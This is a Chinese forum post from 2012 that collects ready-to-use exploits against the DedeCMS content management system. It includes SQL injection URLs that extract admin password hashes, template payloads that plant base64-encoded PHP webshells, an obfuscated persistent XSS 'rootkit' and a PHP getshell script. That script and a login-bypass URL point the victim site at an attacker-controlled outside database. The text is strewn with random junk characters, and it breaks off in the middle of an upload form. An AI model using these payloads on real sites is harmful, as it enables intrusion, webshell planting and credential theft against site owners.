dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞  J  f( q+ o: x4 g$ ^
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15 r% ^5 N4 l4 q
: S5 ^3 W1 f( Z0 D4 b+ [& Z+ z
# f' v, j6 M# H+ @. y; `4 Y
9 q8 `( r8 V  {2 i9 d! Z' _) Z) b# d

  t* _; H/ I* F" k' I
  D0 Z+ z5 d( X: O8 R* e: E. V( E) R5 n1 g0 x: @* d

, K6 b, Z( l8 {& `7 c: `, I, m/ j) P: _/ B/ ~+ Q4 N3 o
DedeCms v5.6 嵌入恶意代码执行漏洞* Y+ _, u" H3 m) b
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}2 T& V7 Z+ ]3 g/ B+ l% U
发表后查看或修改即可执行
+ q5 V) u: G9 i4 |+ ]6 @; Sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- w; w% i1 m* q生成x.php 密码xiao，直接生成一句话。
7 v7 d" m9 {& H* _& F9 U/ C% f9 [5 @! o1 [
% ^- n8 |) G' f
5 o: \6 A" g* z( ]; C* [& K5 m

! O: ~3 n4 K! B% v' h! N" `1 P5 a, b- C* Q8 }$ a$ F
! j0 z3 ]* D/ `* ^( T2 f1 Z! O
/ o) J6 c. d$ p" M; t
9 y8 v+ y% H. [( \) O8 ^
Dede 5.6 GBK SQL注入漏洞  M5 D- F2 m+ q5 {/ s
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
" S* F6 n  X( g8 S1 c. [& Shttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞& _5 }/ @; J0 B* U3 _- t4 V) L
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( h5 c" L+ N8 x8 V/ V9 S
) m8 ~7 y; h# u1 m/ Q: H3 z. @
5 A" l( w: d  g4 k7 G! ]( b: s
; T, a+ E# c/ B3 U
/ T6 I# }- u/ \. s: D( ^9 M& p* Q7 Y6 \/ Z% l  j

6 ~& y& y4 g9 g7 ]DEDECMS 全版本 gotopage变量XSS漏洞! W) q5 i: \9 n! W" N; A. W5 |( {
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 2 J9 L) i7 r* U* q' `. u0 n
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
' t. @! n8 W' n* W; B
" n4 X; Y; U3 T, B; C5 q" }& G" t8 e. a$ C: M
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
; l" z/ @. P& C( ?3 k% K1 [$ p3 U" @http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell5 r9 m4 o: c; l$ a$ x
#!usr/bin/php -w$ p8 D% [% z3 M, E$ ]
<?php
, L% i4 m4 U2 K; A4 }9 B5 Werror_reporting(E_ERROR);" ~5 Y3 N) G/ @$ m! x7 m& P
set_time_limit(0);
$ ?3 L4 u2 W8 [! @$ ~( Pprint_r('
7 D: Q1 b/ X. \5 U" sDEDEcms Variable Coverage, a  e$ U* D" m6 _" M) |. `6 ^! b  Y
Exploit Author: www.heixiaozi.comwww.webvul.com
);# P9 @3 l2 A/ B# U7 C. ^" Q9 T
echo "\r\n";6 Q: N; I# ^+ y% y  l4 x4 d
if($argv[2]==null){- f8 f1 f6 |& T8 f: H$ V
print_r('3 O9 B% T& J+ z6 k7 M/ U' x( b$ x
+---------------------------------------------------------------------------+
& Z* Y8 q7 {& F  F4 W& nUsage: php '.$argv[0].' url aid path. ]$ H) |  i: T. i' S' N
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
+ L& U. n# |' \# `( M. yExample:
& x: n1 {/ b9 Z8 Mphp '.$argv[0].' www.site.com 1 old0 e( l9 T; l- z7 \
+---------------------------------------------------------------------------+$ @; J) _* h; a+ m
');
$ J0 Z8 o/ c9 \3 W5 N6 ?exit;
* Q) T4 F2 c" k  d}0 Z# c9 j5 N/ b0 ]# q! ]: e
$url=$argv[1];
! U& f" B# O/ c! I0 L$aid=$argv[2];
# t8 z. S3 Y) |$path=$argv[3];
! l0 `3 K: M' D: S/ Z9 X( h5 d' O$exp=Getshell($url,$aid,$path);
: F0 s8 t+ w) Q% \* G6 b0 O+ H- |/ k: eif (strpos($exp,"OK")>12){+ \: n2 g' p7 A& b3 |, d3 V9 G
echo "  b5 l2 m& Z  [# J7 d
Exploit Success \n";
& P# A& k( g0 J3 E3 s* e3 @" Oif($aid==1)echo "
* t$ c1 q' g5 V- VShell:".$url."/$path/data/cache/fuck.php\n" ;' }4 \* w3 B+ T& b+ a/ E$ m4 ~

% j( ~, q% B+ n2 k
! }. }& G' Z: y& F; O) }8 p4 }( Y% W. jif($aid==2)echo ") h: F6 X8 r* V4 Z0 o  D' _7 ]
Shell:".$url."/$path/fuck.php\n" ;
7 q5 b. t5 k# n  C$ e: E* s3 o1 l) h; O- D' m* D
7 G  V, p& S8 Y8 W. w
if($aid==3)echo "
6 l1 G$ J8 K  V) l/ xShell:".$url."/$path/plus/fuck.php\n";
: r, C2 v  p7 t; X7 j, ]7 Z& S  m! y1 y- C' t2 s
1 u& T# }( k7 ^+ R: A" o
}else{# T2 _: A; b6 j% B9 w
echo "
" b8 ]; |7 W1 tExploit Failed \n";
) i( F  z) z# G2 D8 a, f8 W* k0 P& S}8 w$ {1 a- g/ I- P) G
function Getshell($url,$aid,$path){1 y* r' v7 H" b6 }% E
$id=$aid;/ B! Y* J1 J) v8 F# w; b
$host=$url;) ]! m  M" A* v2 {
$port="80";1 n) O% P4 v$ M3 i
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
; z! u7 h" o, [) f$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$ C- q$ F; v, U- H$data .= "Host: ".$host."\r\n";
& R- T* d- b  x/ F. _$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$ B" m: E4 N2 p7 ]+ z$ ^9 }* Q
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";# E/ c3 ?  G8 ^! z
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";& E3 K1 Q6 ~" B: y/ M" m7 M
//$data .= "Accept-Encoding: gzip,deflate\r\n";
4 M9 F( a) P7 v4 X" u) c2 {) Z0 W- T$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
0 S4 @9 G$ x6 ?' I2 S! a$data .= "Connection: keep-alive\r\n";+ I; C& o( N% k6 i0 H6 ?. u) m
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";+ d1 X  Q# y$ ]
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";7 H8 g' B6 r- d, P) R& U! [
$data .= $content."\r\n";7 n8 B6 A+ P; f) b2 B
$ock=fsockopen($host,$port);
0 t- p% r6 f* {: Eif (!$ock) {% ~' @+ v! x* {6 L
echo "
+ M3 C: N( e' D0 F1 s  X4 {No response from ".$host."\n";
8 t' a1 |3 u. S1 |& m% f}
: R) H1 {% Z  O' I, Ofwrite($ock,$data);
* A* K( ~9 D# v- K  I4 P" kwhile (!feof($ock)) {
. |0 \, F  W6 e& R( ^2 N$exp=fgets($ock, 1024);
2 Z" F4 c7 M; }: F- \3 }return $exp;" @- i0 G( [; |% x' u/ Q
}
& e( n; Z9 E2 n  M; t) u}
! _! ^* z, R- L' A( I/ |
% n/ ?! B+ J4 h) s5 }0 D" _& U/ @) `* U
?>
( V5 S6 R. S/ s5 s* z, u. b$ n6 i' b7 q
3 D4 ^# i. Z8 ~6 J1 P

3 P* P; L" H5 B# E3 \" P0 C0 U2 A9 D" A1 O, |) c  r/ K& o
: t# d5 _) L3 [/ e
5 o  q# U1 d0 V( B3 P% M
3 E* A6 T! `3 Y6 U# d; \
0 A5 H' P4 y3 B6 Q) @0 y/ G9 ?

3 i- Y7 ^1 D( ~% i8 R; J5 Y9 U) U3 E7 S
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
) L3 X+ O9 u7 S* B9 V+ whttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. B; G% Q6 s+ @* `5 T

; H2 b) f! U: }8 \3 ^+ [
$ k! J; Z: [5 Q7 v' {, V/ d把上面validate=dcug改为当前的验证码，即可直接进入网站后台
" H$ H' H4 H8 P+ Q; e
& t: u' g2 d  {; X: k- n) ^) w+ l, `( S3 X+ a0 y
此漏洞的前提是必须得到后台路径才能实现2 x/ V) F6 I  C

6 M3 d; y! X6 T+ i' V* |+ w2 t* ~5 \, p

" r" e/ V8 \  V+ V$ r  b5 U
$ ]2 Z8 Z3 r6 j3 m, D8 Q% g$ R  I' K2 H
$ y, f1 C$ ?5 V" }- j4 f4 J4 z
6 ?4 o, t& T' g1 P9 {) z" o

* |2 B/ ^& k1 c3 J9 e5 a1 J
$ O2 J1 i3 ?; a' D5 y7 ]0 S) u+ a* [; r. u$ k, Y
Dedecms织梦标签远程文件写入漏洞, z: \3 R1 G- F
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');/ w% [  t1 o4 G8 R& L9 l6 w

4 Z, }) N! N* {) G+ f  \) O9 {# [; X3 ~
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
: ]2 k9 e' K( J; b2 v<form action="" method="post" name="QuickSearch" id="QuickSearch">
& k; g! l, x9 b% X1 _<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />" _/ V4 I4 a2 _
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
( y, K) X9 Q7 h0 U<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) g% _7 Y9 X0 s- V+ s8 o' m$ Y$ ]
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
# S7 u! P5 W( O+ U( c* j) S* n<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: Z' c( C! c& w- ~# c
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
. O& W7 Q: T% [' b/ o<input type="text" value="true" name="nocache" style="width:400">  V5 k4 N+ b  F' Y
<input type="submit" value="提交" name="QuickSearchBtn"><br />4 Y# D/ {  ?% F  n; J; P; g& g, S; w4 u
</form>* @+ M8 L4 J) x2 B; b' L
<script>
/ I, f9 ~# h6 f/ [: X. X4 K/ ]$ Nfunction addaction()) b+ W7 u" _6 W2 q8 n+ x
{
' [. M/ f+ X1 W5 O1 k6 t7 W* z5 m! Wdocument.QuickSearch.action=document.QuickSearch.doaction.value;, ]& f+ s0 U  u5 Q! n( d( d& S
}
# j" z" R! _4 B) p7 U# H2 Q</script>
* c, h3 E: h8 U3 v# O! @5 ~0 p4 s0 v. P- Q6 P0 b6 u6 d

, g/ e# m* y% q. r
8 l; h( _3 m1 B$ q7 V* E% D" Z( _  B2 x  _
0 k% t4 M# }# q, v

+ a3 ~; }5 q: W1 n5 R) h( ]% [& y1 p) I8 P% e( k+ |& e

( a) N) ~+ ?. I/ B! A; L- u- P
0 R2 k, W1 u3 t8 x  r
" x- ?' v' e( {3 ~DedeCms v5.6 嵌入恶意代码执行漏洞
& v9 h8 l4 T. a  A注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行7 m$ B  i% O. J# E$ h' j" k
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
/ x+ b% i8 ^" [  M: p生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得8 z1 s7 g  J4 Q' A
Dedecms <= V5.6 Final模板执行漏洞+ U2 J, P) t9 s2 f1 G0 p
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
, Z- r! e# O' u' `+ k0 B6 w' g0 _uploads/userup/2/12OMX04-15A.jpg
. v; m' j/ v. e/ u) ]9 H0 y; U4 i3 C- b, I4 J' g
! J9 o/ P5 n( Y! [2 J
模板内容是（如果限制图片格式，加gif89a）：
9 v# J/ b, a6 @) ~0 M{dede:name runphp='yes'}- ]0 G( {. N+ @5 r, d  M) o$ I) t
$fp = @fopen("1.php", 'a');
3 [$ R- I- e$ P+ a+ c# @. }@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");% x$ i+ i4 q  \- e& }
@fclose($fp);) W( B( b4 \8 w/ L  |4 {0 O
{/dede:name}/ M8 Q! s& v+ p* U& c7 ~
2 修改刚刚发表的文章，查看源文件，构造一个表单：% i4 e" Q' d1 y& p: b9 S- {
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
+ w  U$ n* ~; W  e9 I# ]4 q<input type="hidden" name="dopost" value="save" />
2 b! L+ [$ F# l6 u<input type="hidden" name="aid" value="2" />
# r9 u8 Z5 ?6 t' j. @( o<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
: t" J2 a1 l/ h<input type="hidden" name="channelid" value="1" />
- V: Q  P% ~1 c$ A8 I<input type="hidden" name="oldlitpic" value="" />$ a0 y5 D" W. o% R
<input type="hidden" name="sortrank" value="1275972263" />
5 \+ ^; w: r2 \' s. m$ I. z( e: i" ]9 p+ L' y. Z6 _0 l
1 e2 Q8 J8 s, u0 O0 _. j5 o
<div id="mainCp">
( ]# l4 J- _- x7 z7 u8 m: O. A<h3 class="meTitle"><strong>修改文章</strong></h3>0 T- l2 t1 X6 G

" e, A( c* Q) o+ |
) f" k( {( @, E( y7 J& n& }" P<div class="postForm">9 N- S6 }# v9 H# j" h
<label>标题：</label>
5 m0 E+ A4 \2 T# g/ G7 W- D7 T7 Z<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>* t3 z+ _# O0 h* g

6 @/ ]- B+ e! D$ {- v; N6 {4 i
: h' {( Q& |4 m( T0 O* C( i<label>标签TAG：</label>: ^# j7 A2 c6 G$ c8 Y
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
0 c1 _* |1 B  z0 l+ a  m9 |# p2 s; B7 e- }7 Y+ X- e  {
" u+ p. G8 z' A7 I5 V0 k
<label>作者：</label>) y0 ^' w' _9 [, h$ T( ^/ E/ L
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>& `+ }% A, p/ T7 O/ g& w
( y' h/ A* s& S
  _4 ~! y: g" N$ ~9 N7 u+ p
<label>隶属栏目：</label>7 v: B$ N5 q* P+ x
<select name='typeid' size='1'>
1 l8 H! X4 k. x( n<option value='1' class='option3' selected=''>测试栏目</option>. A; }2 X0 \9 B( T# u* x5 V
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)% j& [! ~( b6 w. @4 _

9 Y- }/ E6 t  X, N- Y$ V. T7 r+ l, S- H/ R2 m. a$ V) U
<label>我的分类：</label>
$ E! ]% R4 o. b5 O9 l, G<select name='mtypesid' size='1'>
! A' W) l- b# v<option value='0' selected>请选择分类...</option>% a( ^- V# ?9 }) \+ U) O# c1 s6 Q$ \
<option value='1' class='option3' selected>hahahha</option>
, ?6 F. x9 t) e</select>6 \! N! }9 `! `7 T6 ]* `

1 C/ b5 l  `2 N6 `' l
( V) p* Z. b% _0 x<label>信息摘要：</label>3 z: x3 H4 M4 t4 N5 _& R
<textarea name="description" id="description">1111111</textarea>; M$ q7 u. u  J; {1 Z* S' D4 I
(内容的简要说明)
+ \% D& t5 W& A  e% |' o
6 {; R! S  @2 Y6 h6 X  u
7 J! B, f8 J% D1 ]0 x4 X<label>缩略图：</label>
9 ]$ N0 ]# ^% d  P<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
, j+ Q$ m" Z5 p/ X4 t5 u, R2 H$ z! X# O

4 z8 _: o3 j2 R: ]$ \( e8 ]8 @4 D<input type='text' name='templet'- s# I, g, D  l( i) c
value="../ uploads/userup/2/12OMX04-15A.jpg">
) h$ [. [4 O/ n- w  A+ E. u2 C<input type='text' name='dede_addonfields'9 F( T# R2 ^5 e, C& o7 a( f$ b( X
value="templet,htmltext;">（这里构造）
/ m- i" g' O; A! B4 S</div># T, y0 Z! Y% l, l5 H2 k

& A; e+ l& d: m( a  z2 y5 E& g, a9 d
" N( n. l! j1 h5 D& P; U4 j2 f2 F4 e- v/ |6 {
<h3 class="meTitle">详细内容</h3>
. }0 B- ]: T8 X3 Q3 ?( f+ B& K0 \8 E! a
; N6 ]( S) `- ~, }! K# [6 w; _
<div class="contentShow postForm">: X% t: r6 B2 ^5 W2 F
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe># o( W8 D4 A$ x, n) g* x
2 q$ s% s& ~- q/ z" D

) r! l0 ^1 O* H/ d1 `+ N$ D, h<label>验证码：</label>2 ?- W! ]# j0 M* V, T# ]
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
2 \& u: F+ w& V8 m# `$ M9 d<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
8 X$ i2 v# a  ~3 \0 p6 j! ~9 K" E6 e# t6 ]- A3 P9 x0 S
, ^$ P; {7 O  f+ R! W
<button class="button2" type="submit">提交</button>$ a$ g$ Z9 J/ [! R/ K( Y/ K
<button class="button2 ml10" type="reset">重置</button>* Y1 D& X& c$ a
</div>
: D. D6 `! I8 J7 a4 a0 D( U2 N) {9 F+ S9 u1 J( ?7 p

  k* h9 ~' [2 {) U</div>* v1 i! ?( i3 u: T, T: R0 H

) r8 @1 V2 t4 E! g: D- ^1 R' U7 S2 O3 ^- k* m' m( o9 n0 p/ q
</form>5 H# ]( |# O# @: Y8 O
5 B" H4 h3 R; n  D
& ]4 r: i7 q5 R6 [8 r
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
0 r/ d( N) K6 i1 D; x假设刚刚修改的文章的aid为2，则我们只需要访问：
" w+ z+ [- e2 F9 `; |( g% zhttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php( ?6 m5 a9 V3 s* g5 r, h: ]" L
4 o, z2 g/ T; i. {. I2 L
7 D% }9 \( P- b+ Z, G& R# d
% h) w3 _, P/ ?3 H2 `

/ z6 w* o; m; R2 t/ C2 p3 C/ F6 N. H. `8 Y- N

% h  q- q4 a2 p. v6 ?+ H5 D, j+ B
- S- }8 Q# d6 O  f, d# e# x' g! n, d  M' g2 T
% C$ p0 Y& w( T: ^8 }# M

/ Z0 G" O" G, n: r6 S8 g2 O- J: A  h& M, s
7 B5 x1 L- C" @4 H/ ?9 t
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
4 I" s/ _: p; f/ ~" RGif89a{dede:field name='toby57' runphp='yes'}
, \$ Z& Y( k7 \3 sphpinfo();
& J6 q( Z: W/ p2 L, P0 S{/dede:field}
2 {1 c, m3 H* t保存为1.gif
7 D0 D, G8 H  ^0 ~) l<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
4 I7 Q$ x3 Y$ \: J3 x( n<input type="hidden" name="aid" value="7" />
6 `+ E+ t7 B' J/ x: u<input type="hidden" name="mediatype" value="1" />
' S, g7 e5 D- E* l<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ) G# U( G* c: e1 i) D6 i8 h. |
<input type="hidden" name="dopost" value="save" />
3 a7 ?+ k3 F5 V<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
) d# {. Q  I* c2 e5 t<input name="addonfile" type="file" id="addonfile"/>
# D+ L5 [4 B- R1 I% {: X- U<button class="button2" type="submit" >更改</button> 1 `$ L9 E( h2 w' l# v) a( Y
</form> ( ^$ i, {: _7 f. L3 u0 N3 @* R: w
; l$ u, F  ]- p( Z! Y

7 L  n4 }# Y) c; J2 z构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
; J+ D- S4 |* j+ X8 |0 C" S发表文章，然后构造修改表单如下：3 H' B0 K7 Q* x! k" @+ ?' A% u

2 f5 G# n* Q) S' t
' Q0 ~* G  Z; C$ }1 B. K" O* P<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> + q" ~( H4 f, n( h1 e& j$ I2 g* P0 b
<input type="hidden" name="dopost" value="save" /> 3 H/ h3 \6 k" f4 M  O
<input type="hidden" name="aid" value="2" />
7 q2 O7 ^. Q9 k+ }<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! E- l. U. o! ?. `<input type="hidden" name="channelid" value="1" />
5 r" y; T2 i; q$ E2 I) b& I<input type="hidden" name="oldlitpic" value="" />
3 ]- [/ b5 D) {; ]+ i3 n) n# H<input type="hidden" name="sortrank" value="1282049150" />
% |' R1 B: v+ H$ x; ?<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
9 K. X7 E6 p' O/ m  I+ e<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>   y7 ?7 e+ d0 a$ p" x/ p) @
<select name='typeid' size='1'> 9 E+ P5 I$ c1 y( V. A+ }
<option value='1' class='option3' selected=''>Test</option>
% i& b# A. w" |<select name='mtypesid' size='1'>
9 G( @' Y1 D* s. d  G; g) l4 x7 p<option value='0' selected>请选择分类...</option>
2 _3 i/ p7 U, J. z<option value='1' class='option3' selected>aa</option></select> 1 c  W" Y0 R) S2 g4 \% \$ i. z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>   a3 ^( V, P5 D# {
<input type='hidden' name='dede_addonfields' value="templet"> ( N- j" \; F2 x- ]+ D
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
: t" I- B3 U4 i3 |  j' M, q<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ! m+ h2 \* q8 O& r# W0 [5 @
<button class="button2" type="submit">提交</button> - {, `7 E# V7 Y8 L, T9 r" ?8 U
</form>
3 i* V( D- U: L4 j. g- S, @' {4 w0 q& H- ~/ x

5 e9 W. ~2 v( c8 ^1 h7 ?3 Z% u$ k6 Y5 z: W2 s0 G  y. A% I
; H' x8 c3 C, w# @

6 p, Q" S; @3 g( z2 ^! h$ h" }3 C! w  |; j- ^% B( E
5 Z, w  ]/ F8 G# [* S

  S) y7 t$ ^/ J4 |4 J" K
" T/ O! G8 w, z1 Q- |5 M4 ]; A- t% y6 j# \. j
, z; J8 `3 D( R1 E( O1 i" R$ J

1 ~, e1 E* H1 s: G* M- c织梦(Dedecms)V5.6 远程文件删除漏洞4 B: o: s. B+ q! _8 b+ a
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 + L7 `6 O( R- b! d8 Q; P
http://www.test.com/plus/carbuya ... urn&code=../../
$ d% n: m, i& h& m* _/ D# m% X8 A$ \* L4 q7 W* q: m! p
' \& P. ]7 Z7 [" \$ b

) X- ?$ `! \# z* I7 V6 ?! y( g' q" j, ?/ ^8 ^
* X3 S  p: ~9 c! ?- S

# g1 K0 \* O" I
  P/ i& B: v2 ]0 }- j$ ~: Y* l: j- Y
3 n; e/ ^6 r' \( W5 V
4 C1 D* j2 j# I- t$ E9 X: o0 Q2 ^
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 2 u; Z, v5 i- L5 q; P
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`4 u* E$ |4 o7 [: q
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
  L0 ]2 G6 p) f" e8 X$ ^" a1 x/ x8 e- Z" I$ w
0 l# S3 B& a. o3 H% K/ Q

; i4 S* R9 `$ |& e1 N) h7 q5 z* b, R. U6 o4 u

0 N" y  v; E+ X) {3 A: J# a, B' r
  ~0 `' x2 d2 n: g% }" v4 O# e( p7 M; I1 H% e) }0 M, w4 ~
3 ]/ Z$ g! q+ W$ ]0 j+ E
6 s$ _8 X8 h9 E* l) D7 f5 n
' c( X# j, X( R
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
1 v# D2 y( M+ M2 jhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
1 X9 l8 _# R, w9 c: C
' u/ C9 u: b0 M* }% w: f  A
$ x) f; w7 o! N8 Z" W3 t5 P9 A7 d3 X3 y% X' S! C" {

  b8 B. S3 m2 ?2 B: r
8 V3 p; {! k! v& q% G2 i/ F( X2 @6 C' R
5 C9 s7 W& F* W3 x) y" I
4 c0 g# O/ A: _; |9 e/ e+ M" y5 u# M1 B. U4 z
2 d) p* f: M- G6 q% R; ]
) v% a+ q" S9 _- D" f$ l7 y9 y' [
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞8 c5 |1 M6 @/ T: ^& V4 t* z% G
<html>
, Y! C" }" N- K* \& k& i' B<head>
/ h: |; P( N; j/ q* O5 s1 ]<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
0 M$ y1 E8 N+ X( f; |; D( c- H% U</head>
3 W7 ^& P  _( H" e" y1 n& H<body style="FONT-SIZE: 9pt">
$ K/ |3 P) S. o# y$ a( B$ P---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
, G  ]* W, N: E- K<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>9 k: \  e8 j# ~" }/ y1 v
<input type='hidden' name='activepath' value='/data/cache/' />' D/ q( }9 \. K$ K
